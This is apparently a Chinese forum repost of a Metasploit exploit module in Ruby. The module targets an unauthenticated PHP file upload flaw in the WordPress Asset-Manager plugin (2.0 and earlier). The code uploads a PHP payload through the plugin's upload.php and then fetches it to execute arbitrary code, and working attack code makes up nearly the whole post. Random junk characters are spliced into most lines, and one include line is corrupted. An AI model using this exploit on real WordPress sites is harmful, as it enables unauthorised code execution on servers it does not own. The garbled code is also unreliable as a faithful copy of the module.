这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。" ]2 s" J+ y0 w$ a: O) ^
6 |. D& R! Q) Z* Y) p' g6 e* i" e
##
7 J$ ^ H. @/ n# j* k# This file is part of the Metasploit Framework and may be subject to+ d0 ~# A9 [+ y1 q1 Q& x
# redistribution and commercial restrictions. Please see the Metasploit4 y7 {2 u* z5 V: x
# Framework web site for more information on licensing and terms of use.9 {8 T& P4 b0 @, L) a: n$ T
# http://metasploit.com/framework/
' E6 T2 b" \; a4 N# }##
c! C3 h2 L1 z# ]1 \
& b4 K0 H1 i. D; S- Crequire 'msf/core'# z5 R6 D0 [1 l$ h6 H
require 'msf/core/exploit/php_exe'4 N0 t8 l3 h6 b, K; I: Q
F9 Q# f( m( p" l7 h2 Lclass Metasploit3 < Msf::Exploit::Remote. \" P& t7 {; ~' v
Rank = ExcellentRanking
5 x0 i# H5 q Z8 U3 T0 o
. D/ }/ n. @' l4 j( ]7 [2 [& S include Msf::Exploit::Remote::HttpClient B/ E+ B% ]8 ^
include Msf::Exploit: hpEXE1 U8 t i+ I' \0 \ m: o' t9 J
: _* h0 U: y4 H def initialize(info = {})( ~ p+ q2 h, Z; Q
super(update_info(info,
: y0 v$ n# Z0 ], j0 D* q 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
. y: m1 d2 E) w( t9 ~ 'Description' => %q{ S* Z5 B4 R4 T5 k9 u5 K
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress: v6 e+ S, i; t) u
plugin. By abusing the upload.php file, a malicious user can upload a file to a
1 `: a! x( y2 H8 N: N& R temp directory without authentication, which results in arbitrary code execution.
I) `/ p) z: {$ [0 I },
; b: m7 m8 F/ z. V B! X 'Author' =>/ T4 U4 ]( @/ y% H5 _. d2 v
[
& n* m, g3 u8 Z1 A) O% M( l 'Sammy FORGIT', # initial discovery8 f" ?6 A8 D \- V) Y
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
7 p& t+ I I2 c6 m# L' m; h" f; M( K ],
. I! b0 x G1 z& ] B% | 'License' => MSF_LICENSE,
0 F) N# F; \# K/ {) r 'References' =>: ?' ~' v- U$ J. \/ @( q2 K$ E
[1 p; J; D6 v4 X+ D5 m- u) ]1 R' b
[ 'OSVDB', '82653' ],; V9 [1 Q3 o- N4 H: k& N
[ 'BID', '53809' ],1 _: E) I6 \8 W) t( A1 C
[ 'EDB', '18993' ],
% ~) v) b/ j# \, z& t3 F5 x; e; R2 q [ 'URL', 'http:// www.myhack58.com /' ]$ L! ^; _& P, m+ I5 d! j
],
$ F5 A: Q) s8 F% t$ C 'Payload' =>
/ v% [2 n6 `3 i- v" A {' _' L {% I0 b# j! V
'BadChars' => "\x00",
/ j7 {3 B |: [7 X, i },5 ]# [. b6 \% v% Q/ r B: j
'Platform' => 'php',9 V7 S( v5 J! i" ^2 i( b2 }
'Arch' => ARCH_PHP,/ j8 J$ a! h2 _# b' N; i3 V( }
'Targets' =>1 ]6 f; A, a W. t% J
[
1 \0 o! _ r( h+ v8 M" H [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],! b [. r: V$ {$ l. ~# Q
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]1 Y5 p" T& K' X+ C% r
],
, N- \5 t/ P, e) D 'DefaultTarget' => 0,1 ^5 I5 l# Z9 c- O* e! o
'DisclosureDate' => 'May 26 2012'))
5 e6 y6 p% U' j1 z1 C6 n: n# L9 y
; t& d, Q, Z R% B register_options(
: ^$ [2 [. S3 v2 w ^# t [( W# w# ~6 R; E% x
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])) G3 _" I. L, V* ^, B. W2 \
], self.class)
: e" [( O7 M- ^0 l end
/ A& P4 z2 C! U/ J( _2 c / u+ h7 f: Y/ Y+ u' d
def exploit: |' S7 w/ ?3 [1 E
uri = target_uri.path2 G6 e7 F7 {0 V5 O; H8 k: [, f" t
uri << '/' if uri[-1,1] != '/'6 }2 k/ V6 Y# c9 e9 C) {- ]
peer = "#{rhost}:#{rport}". S/ Z( B" A( W
payload_name = "#{rand_text_alpha(5)}.php") |/ y% n* y, W# D* T
php_payload = get_write_exec_payload(:unlink_self=>true)
) B0 r5 ?6 ?2 F" J! Q& h5 Q6 a7 Z
0 B, z( s1 w$ [$ [' u, E% |8 I9 X data = Rex::MIME::Message.new% `, p4 D/ k6 h) x' N
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
6 F( w3 T4 U$ C/ _ post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')9 a1 n. t$ R2 ]: L
1 m) x& I( _& I) c print_status("#{peer} - Uploading payload #{payload_name}")
' H' H3 l- F9 X' d3 N res = send_request_cgi({
( Q4 N _5 ~! z8 Q% @: C 'method' => 'POST',
, i% |$ W+ r$ s( i+ a* ]3 |5 U 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
! v$ ?/ b+ O' f# M( h+ V2 a 'ctype' => "multipart/form-data; boundary=#{data.bound}",
' @* c+ A2 k7 e: x1 H" ` 'data' => post_data
; a. D/ H* u9 o# I( ^7 w }); [. u# ~ }$ s. o0 G+ J2 \
# f' D4 S, _5 z; k& t% A
if not res or res.code != 200 or res.body !~ /#{payload_name}/& c% @3 C: s( @% W9 ^2 b
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
4 x/ ^3 J0 p: }6 g [% kend
3 D/ U9 \2 I1 o3 b# V, ? 3 U1 _. S3 e( [
print_status("#{peer} - Executing payload #{payload_name}")" r( x- {$ `" D U% G
res = send_request_raw({5 I9 ~& e$ E' w( {* y
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",2 p; Q: D8 g* X5 c/ I
'method' => 'GET'
" D9 R0 R. n: [) N })
7 K: S: ?; x! Z$ f# J/ B4 b
9 K4 X: ^/ O1 O6 m( @( D if res and res.code != 200
! L) W2 {2 K! i, y2 Y5 H# D fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
. b' Y* x# c" f9 X; ? end
- ]$ @: h( w$ y+ W1 o( ^6 | end
) L( d+ Z* x3 c* }end
, @( A- Y' T( s& X5 r+ a' T& M$ H |
发表于 2012-12-31 09:22:33
收藏
支持
反对